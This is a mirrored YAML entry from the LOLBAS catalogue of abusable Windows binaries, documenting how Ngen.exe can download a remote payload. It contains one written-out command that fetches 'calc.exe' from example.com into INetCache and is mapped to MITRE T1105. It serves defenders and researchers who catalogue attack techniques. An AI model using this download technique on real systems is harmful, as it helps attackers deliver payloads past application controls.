mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-01-01 01:27:53 +01:00
24 lines
828 B
YAML
24 lines
828 B
YAML
|
---
|
||
|
Name: Ngen.exe
|
||
|
Description: Microsoft Native Image Generator.
|
||
|
Author: Avihay Eldad
|
||
|
Created: 2024-02-19
|
||
|
Commands:
|
||
|
- Command: ngen.exe http://example.com/calc.exe
|
||
|
Description: Downloads payload from remote server using the Microsoft Native Image Generator utility.
|
||
|
Usecase: It will download a remote payload and place it in INetCache.
|
||
|
Category: Download
|
||
|
Privileges: User
|
||
|
MitreID: T1105
|
||
|
OperatingSystem: Windows 10, Windows 11
|
||
|
Tags:
|
||
|
- Download: INetCache
|
||
|
Full_Path:
|
||
|
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.xxx\ngen.exe
|
||
|
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.xxx\ngen.exe
|
||
|
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.xxx\ngen.exe
|
||
|
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.xxx\ngen.exe
|
||
|
Acknowledgement:
|
||
|
- Person: Avihay Eldad
|
||
|
Handle: '@AvihayEldad'
|